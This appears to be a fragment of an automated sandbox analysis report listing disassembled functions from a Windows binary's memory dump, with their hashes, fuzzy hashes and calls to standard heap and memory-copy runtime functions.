                                                                  • Instruction ID: aa2d8b5582d9b64729237693f140dbee15a7026ae36aec2578c4399e8cad8076
                                                                  • Opcode Fuzzy Hash: 0435e2144dcb32c2caac5c4a8d096ba227c30ca1066ce73e8d24587ca332f8ef
                                                                  • Instruction Fuzzy Hash: 2D31E371A1060A8FDB44CF2CC980AAE73FAEB85304F50C639D45AC7651EB32E659C7A4
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C600A4D), ref: 6C65B5EA
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C600A4D), ref: 6C65B623
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C600A4D), ref: 6C65B66C
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C600A4D), ref: 6C65B67F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: malloc$free
                                                                  • String ID:
                                                                  • API String ID: 1480856625-0
                                                                  • Opcode ID: 076f0341def48c2856852323488a62df40f2416389f6e6b3ed81de3e98ec90ee
                                                                  • Instruction ID: c23b2672edeb622b8c6a9b748d6a43e3faaad7f54890abfe2f220f122e598986
                                                                  • Opcode Fuzzy Hash: 076f0341def48c2856852323488a62df40f2416389f6e6b3ed81de3e98ec90ee
                                                                  • Instruction Fuzzy Hash: 1331E671A012268FDB14CF59C88465EBBF5FFC1304FA68969C8069B381DB31E925CBE5
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C62F611
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C62F623
                                                                  • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C62F652
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C62F668
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID:
                                                                  • API String ID: 3510742995-0
                                                                  • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                  • Instruction ID: d88d0c45e0c69dde644ed4b5e6c6c90efef5522fb6d1d90c653d7cabbef341a8
                                                                  • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                  • Instruction Fuzzy Hash: 7F316F71A00624AFCB14CF1ECCC0E9B77B5EB94354B188538FA4A9BB04D636E9448B99
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID:
                                                                  • API String ID: 1294909896-0
                                                                  • Opcode ID: bf16d9187f49f53a42b334f696d146f08f7b52ea539854f7b31d3246b060455f
                                                                  • Instruction ID: 13c31a334c50f1af691b0acc2cd82d4188c51f604d78f7e48d683685b78cfcc5
                                                                  • Opcode Fuzzy Hash: bf16d9187f49f53a42b334f696d146f08f7b52ea539854f7b31d3246b060455f
                                                                  • Instruction Fuzzy Hash: 9BF0F9B2B012006BE7009A19D8C895BB7A9EF4135DB308035EA16C3B01E332F919C7AD